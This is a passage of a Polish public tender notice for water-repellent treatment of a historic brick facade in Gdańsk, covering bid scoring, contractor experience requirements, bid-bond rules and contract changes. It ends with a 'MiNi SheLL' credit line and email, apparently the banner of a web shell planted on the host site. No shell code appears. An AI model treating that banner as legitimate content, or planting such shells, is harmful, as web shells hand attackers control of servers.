Sposób oceny ofert: <span class="normal">Wszystkie oferty niepodlegające odrzuceniu oceniane będą na podstawie następujących kryteriów:<br/>- cena brutto wykonania zamówienia (PK1) - waga 70 %<br/>- termin gwarancji i rękojmi na roboty budowlane (PK2 ) - waga 30 %<br/>przy czym [1%=1pkt].<br/>2. Sposób przyznawania punktów:<br/>1) dla kryterium: „Cena brutto wykonania zamówienia” (PK1):<br/>Sposób obliczenia:<br/>PK1 = [CN / CR x 70 %] x 100<br/>PK1 – ilość punktów dla kryterium<br/>CN – najniższa oferowana cena<br/>CR – cena oferty rozpatrywanej<br/>2) dla kryterium: “Termin gwarancji i rękojmi na roboty budowlane” (PK2):<br/>W kryterium „termin gwarancji i rękojmi na roboty budowlane” Zamawiający przyzna następującą punktację:<br/>a) zaoferowanie przez Wykonawcę okresu gwarancji i rękojmi na roboty budowlane minimalnej czyli na okres 60 miesięcy – oferta<br/>otrzyma 0 pkt;<br/>b) zaoferowanie przez Wykonawcę okresu gwarancji i rękojmi na roboty budowlane na okres 72 miesięcy (dodatkowo 12 miesięcy) –<br/>oferta otrzyma 15 pkt;<br/>c) zaoferowanie przez Wykonawcę okresu gwarancji i rękojmi na roboty budowlane na okres 84 miesięcy (dodatkowo 24 miesiące) –<br/>oferta otrzyma 30 pkt.<br/>Przy czym przez:<br/>„Termin gwarancji i rękojmi na roboty budowlane” należy rozumieć oferowany przez Wykonawcę okres, liczony w miesiącach,<br/>obejmujący: gwarancję jakości i rękojmię przedmiotu zamówienia, niezależnie od krótszego okresu gwarancji jakiego udziela ich<br/>producent, w którym Zamawiającemu przysługuje uprawnienie do żądania od gwaranta nieodpłatnego usunięcia wad lub usterek, lub<br/>dostarczenia rzeczy wolnej od wad. Termin ten liczony jest od daty odbioru końcowego przedmiotu zamówienia.<br/>Minimalny, wymagany przez Zamawiającego termin gwarancji i rękojmi na roboty budowlane wynosi 60 miesięcy. Wykonawca w<br/>formularzu ofertowym (załącznik nr 3 do SWZ) wpisuje oferowany termin gwarancji.<br/>Jeżeli Wykonawca w Formularzu Ofertowym nie zaznaczy żadnego z ww. terminu, Zamawiający przyjmie, że Wykonawca oferuje<br/>minimalny wymagany w SWZ okres gwarancji i rękojmi na roboty budowlane tj. 60 miesięcy i otrzyma 0 punktów.<br/>Jeżeli Wykonawca w Formularzu Ofertowym zaznaczy kilka lub wszystkie terminy, Zamawiający przyjmie, że Wykonawca oferuje<br/>minimalny/wymagany w SWZ okres gwarancji i rękojmi na roboty budowlane tj. 60 miesięcy i otrzyma 0 punktów.<br/>3. Sposób obliczenia całkowitej liczby punktów:<br/>P = PK1 + PK2<br/>P – całkowita liczba punktów dla rozpatrywanej oferty<br/><br/>PK1 – liczba punktów uzyskanych w kryterium „Cena brutto wykonania zamówienia”<br/>PK2 – liczba punktów uzyskanych w kryterium „Termin gwarancji i rękojmi na roboty budowlane”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji i rękojmi na roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie przedmiotowego zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu określone przez Zamawiającego.<br/>2. Zamawiający wymaga spełnienia warunków udziału w postępowaniu, w zakresie zdolności technicznej lub zawodowej:<br/>Wykonawca wykaże, że posiada wiedzę i doświadczenie, co należycie udokumentuje tj. wykaże, że w okresie ostatnich<br/>pięciu lat licząc wstecz od dnia, w którym upływa termin składania ofert w niniejszym postępowaniu, a jeśli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał co najmniej dwie roboty budowlane, których<br/>przedmiotem były prace związane z konserwacją elewacji ceglanej na budynku zabytkowym, każda o wartości co najmniej<br/>250 000 zł brutto.<br/>Przez dwie roboty budowlane rozumie się roboty wykonane na podstawie dwóch różnych umów.<br/>a) ocena wykazania spełnienia warunku określonego powyżej nastąpi na podstawie przedstawionych przez Wykonawcę<br/>dokumentów, o których mowa w rozdz. X ust. 1 pkt 1 SWZ (wzór wykazu należycie wykonanych robót stanowi załącznik nr 5<br/>do SWZ),<br/>b) jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach<br/>technicznych lub zawodowych innego podmiotu, powyższy warunek zostanie uznany za spełniony, jeżeli spełnia go w<br/>całości ten podmiot,<br/>c) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, wyżej wymieniony warunek<br/>udziału w postępowaniu winien spełniać w całości co najmniej jeden z Wykonawców.<br/>UWAGA:<br/>W przypadku, gdy za wykonane przez Wykonawcę roboty rozliczenie nastąpiło w walucie innej niż w PLN, Wykonawca w<br/>celu potwierdzenia spełniania warunku udziału w niniejszym postępowaniu, zobowiązany jest do przeliczenia wartości<br/>wykonanych robót budowlanych przyjmując średni kurs złotego w stosunku do walut obcych określony w tabeli kursów<br/>średnich walut obcych Narodowego Banku Polskiego - opublikowanych na dzień zamieszczenia Ogłoszenia o zamówieniu<br/>oraz Specyfikacji Warunków Zamówienia na stronie Zamawiającego.<br/>3. Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że<br/>Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze<br/>Wykonawcy - może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda<br/>podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia. Tym samym, Zamawiający dokona weryfikacji<br/>wyłącznie na podstawie oświadczenia wstępnego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Zamawiający żąda podmiotowych środków dowodowych na potwierdzenie spełnienia warunków udziału w postępowaniu, tym<br/>samym:<br/>1) zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień<br/>złożenia, następujących podmiotowych środków dowodowych:<br/>a) wykaz robót budowlanych zrealizowanych w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert<br/>w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane (według wzoru stanowiącego załącznik nr 5 do<br/>SWZ) oraz załączenie dowodów określających czy te roboty zostały wykonane należycie, przy czym dowodami są:<br/>• referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane,<br/>• oświadczenie Wykonawcy, jeżeli Wykonawca z przyczyn niezależnych od niego, nie jest w stanie uzyskać tych dokumentów.<br/>2) jeżeli zachodzą uzasadnione podstawy do uznania, że uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający<br/>może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia,<br/>3) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające<br/>dostęp do tych środków.<br/>2. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, jakich może żądać Zamawiający od Wykonawcy, o których<br/>mowa w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r., składane są zgodnie z przepisami<br/>rozporządzenia wydanego na podstawie art. 70 ustawy Pzp.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przez Wykonawcę przedmiotowych środków dowodowych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1Złożona oferta musi być zabezpieczona wadium obejmującym okres związania ofertą o wartości: 3 000,00 zł (słownie:trzy<br/>tysiące zł 00/100)<br/>2Wadium winno zostać wniesione przed upływem terminu składania ofert i winno być utrzymane nieprzerwanie do dnia<br/>upływu terminu związania ofertą,z wyjątkiem przypadków, o których mowa w art.98 ust.1 pkt 2 i 3 oraz ust.2 ustawy Pzp<br/>3Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium<br/>albo,jeżeli nie jest to możliwe,z wniesieniem nowego wadium na przedłużony okres związania ofertą<br/>4Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1)w pieniądzu<br/>2)gwarancjach bankowych<br/>3)gwarancjach ubezpieczeniowych<br/>4)poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt2 ustawy z dnia 9.11.2000r.o utworzeniu<br/>Polskiej Agencji Rozwoju Przedsiębiorczości<br/>5Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Urzędu Marszałkowskiego Województwa<br/>Pomorskiego w Gdańsku w banku:PKO Bank Polski S.A. numer rachunku 62 1020 1811 0000 0102 0312 3098 z podaniem<br/>tytułu:Wykonanie hydrofobizacji elewacji ceglanej budynku przy ul.Augustyńskiego 2 w Gdańsku<br/>6Będzie ono przechowywane na rachunku bankowym Zamawiającego.Datą wniesienia wadium jest data uznania rachunku<br/>Zamawiającego przy czym należy pamiętać,że wadium jest wniesione należycie w dniu i o godzinie uznania rachunku<br/>Zamawiającego,a nie w dniu i o godzinie dokonania przelewu przez wykonawcę.Wadium musi wpłynąć na rachunek<br/>Zamawiającego przed upływem terminu składania ofert<br/>7W przypadku wnoszenia wadium w formie gwarancji lub poręczenia,o których mowa w ust.4 pkt2-4, wykonawca<br/>przekazuje Zamawiającemu oryginał gwarancji lub poręczenia,w postaci elektronicznej,za pośrednictwem Platformy<br/>8Niewniesienie wadium,w tym również na przedłużony okres związania ofertą,wniesienie wadium w sposób nieprawidłowy<br/>lub nie utrzymanie wadium nieprzerwanie do upływu terminu związania ofertą lub złożenie wniosku o zwrot wadium w<br/>przypadku,o którym mowa w art.98 ust.2 pkt3 skutkować będzie odrzuceniem oferty wykonawcy.<br/>9Wadium,o którym mowa w ust.4 pkt2-4, musi zawierać zobowiązanie gwaranta lub poręczyciela do bezwarunkowej zapłaty<br/>Zamawiającemu pełnej kwoty wadium,w okolicznościach określonych w art.98 ust.6 pkt1-3 ustawy Pzp<br/>10W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczenia,dokument ten powinien być<br/>sporządzony zgodnie z obowiązującym prawem i winien zawierać następujące elementy:<br/>1)nazwę wykonawcy,beneficjenta gwarancji (Zamawiający),gwaranta (banku lub instytucji ubezpieczeniowej udzielających<br/>gwarancji) oraz wskazanie ich siedzib,<br/>2)określenie wierzytelności,która ma być zabezpieczona gwarancją lub poręczeniem<br/>3)kwotę zobowiązania<br/>4)termin ważności gwarancji lub poręczenia<br/>5)zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego gdy wykonawca:<br/>a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie lub<br/>b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy lub<br/>c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy,<br/>którego oferta została wybrana lub<br/>d)wykonawca w odpowiedzi na wezwanie, o którym mowa w art.107ust.2 lub art.128ust.1, z przyczyn leżących po jego<br/>stronie,nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności,o których mowa w art.57 lub art.106 ust.1,oświadczenia,o którym mowa w art.125ust.1, innych dokumentów lub<br/>oświadczeń lub nie wyraził zgody na poprawienie omyłki,o której mowa w art.223 ust.2 pkt3,co spowodowało brak<br/>możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.<br/>11Zwrot wadium–Zamawiający zwróci niezwłocznie wadium według zasad określonych w art.98 ust.1,2,4 i 5 ustawy Pzp<br/>12Utrata wadium–Zamawiający zatrzymuje wadium wraz z odsetkami według zasad określonych w art.98 ust.6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia Zamawiający zbada, czy nie zachodzą<br/>podstawy wykluczenia wobec każdego z tych Wykonawców.<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, wymieniony w Rozdziale VIII<br/>ust. 2 SWZ warunek udziału w postępowaniu winien spełniać w całości co najmniej jeden z Wykonawców.<br/>3. Wraz z ofertą należy złożyć:<br/>1) oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu (wzór stanowi załącznik nr<br/>4 do SWZ):<br/>a) Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu w zakresie wskazanym w rozdziale VII ust. 2,<br/>ust. 9 SWZ oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale VIII ust. 2 SWZ.<br/>Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w<br/>rozdziale X SWZ,<br/>b) Oświadczenie składają odrębnie:<br/>- każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, wspólnicy spółki cywilnej),<br/>W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>- podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia warunków udziału w<br/>postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>Wymagana forma:<br/>Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej, podpisane kwalifikowanym podpisem<br/>elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia (konsorcjum, wspólnicy spółki cywilnej)<br/>wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało<br/>umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców albo do reprezentowania w<br/>postępowaniu i zawarciu umowy w sprawie zamówienia publicznego należy załączyć do oferty.<br/>5.Wraz z ofertą należy złożyć oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (wzór stanowi<br/>załącznik nr 6 do SWZ)<br/>w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani<br/>dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy - zgodnie z Rozdziałem IX ust. 2 pkt 4) SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany do umowy zostały zawarte w projekcie umowy, który stanowi załącznik nr 2 do SWZ.<br/>1. Zmiana postanowień niniejszej umowy może nastąpić za zgodą obydwu stron wyrażoną na piśmie, w formie aneksu do<br/>umowy z zachowaniem formy pisemnej pod rygorem nieważności takiej zmiany.<br/>2. Zamawiający dopuszcza możliwość zmiany Umowy w przypadkach określonych w ustawie Pzp oraz przewiduje zgodnie z<br/>art. 455 ust. 1 pkt 1) ustawy Pzp możliwość zmiany postanowień Umowy określając następujący rodzaj i zakres oraz<br/>warunki zmiany postanowień Umowy w szczególności:<br/>a) zmiana terminu realizacji umowy w przypadku wystąpienia którejkolwiek z okoliczności wymienionych niżej, termin<br/>wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu<br/>w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności:<br/>− konieczności zmian będących następstwem działania organów nadzorczo -kontrolnych,<br/>− wystąpienia konieczności przeprowadzenia robót zamiennych lub dodatkowych, które wstrzymują lub opóźniają realizację<br/>przedmiotu umowy;<br/>− nieprzekazania terenu budowy przez Zamawiającego w terminie określonym w § 3 ust. 1 pkt 1;<br/>− przerwy w realizacji robót powstałej z przyczyn zależnych od Zamawiającego;<br/>− działania siły wyższej (np. klęski żywiołowej, wystąpienie pandemii), mającej bezpośredni wpływ na terminowość<br/>Ogłoszenie nr 2023/BZP 00349312/01 z dnia 2023-08-10<br/>2023-wykonania robót;<br/>− wystąpienia niekorzystnych warunków atmosferycznych, które uniemożliwiają należyte wykonanie hydrofobizacji;<br/>− jeżeli dochowanie terminu przewidzianego w umowie stało się niemożliwie z przyczyn niezależnych od Wykonawcy,<br/>których nie można było przewidzieć w terminie składania ofert, pomimo zachowania należytej staranności,<br/>b) zmiana osób, o których mowa w § 5 ust. 1 na zasadach opisanych w § 5.<br/>3. Uwzględniając specyfikę sytuacji społeczno-gospodarczej wywołanej Covid-19, w tym przede wszystkim konieczność<br/>podjęcia szybkich i efektywnych działań Zamawiający przewiduje następujące rozwiązania: w sytuacji wprowadzenia<br/>obostrzeń powodujących brak możliwości wykonania treści umowy dopuszcza się zmianę terminu wykonania umowy<br/>adekwatną do czasu trwania przeszkody w realizacji umowy po podpisaniu aneksu do umowy.<br/>4. Wskazane powyżej zmiany mogą zostać wprowadzone jedynie w przypadku, jeżeli obie Strony umowy zgodnie uznają, że<br/>zaszły wskazane wyżej okoliczności oraz wprowadzenie zmian jest niezbędne dla prawidłowej realizacji zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy zakupowej. Adres strony internetowej prowadzonego postępowania: https://platformazakupowa.pl/pn/pomorskie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 108 ust.1<br/>ustawy Pzp oraz na podstawie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (podstawy wykluczenia zostały<br/>wskazane w Rozdziale VII SWZ).<br/>2. Wykonawca złoży w dniu podpisania umowy, aktualne na dzień składania, oświadczenie, mówiące o tym, że nie podlega<br/>wykluczeniu w zakresie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>3. Zamawiający wskazał w:<br/>- Rozdziale VI SWZ Termin wykonania zamówienia<br/>- Rozdziale IX SWZ Dokumenty składane razem z ofertą<br/>- Rozdziale XVI SWZ Opis sposobu przygotowywania oferty<br/>- Rozdziale XVII SWZ Sposób oraz termin składania ofert<br/>- Rozdziale XIX SWZ Sposób obliczenia ceny<br/>- Rozdziale XXI SWZ Informacje o formalnościach, jakie muszą zostać dopełnione po wyborze oferty w celu zawarcia<br/>umowy w sprawie zamówienia publicznego<br/>- Rozdziale XXII SWZ Projektowane postanowienia umowy.<br/>Ogłoszenie nr 2023/BZP 00349312/01 z dnia 2023-08-10<br/>2023-

Creat By MiNi SheLL
Email: jattceo@gmail.com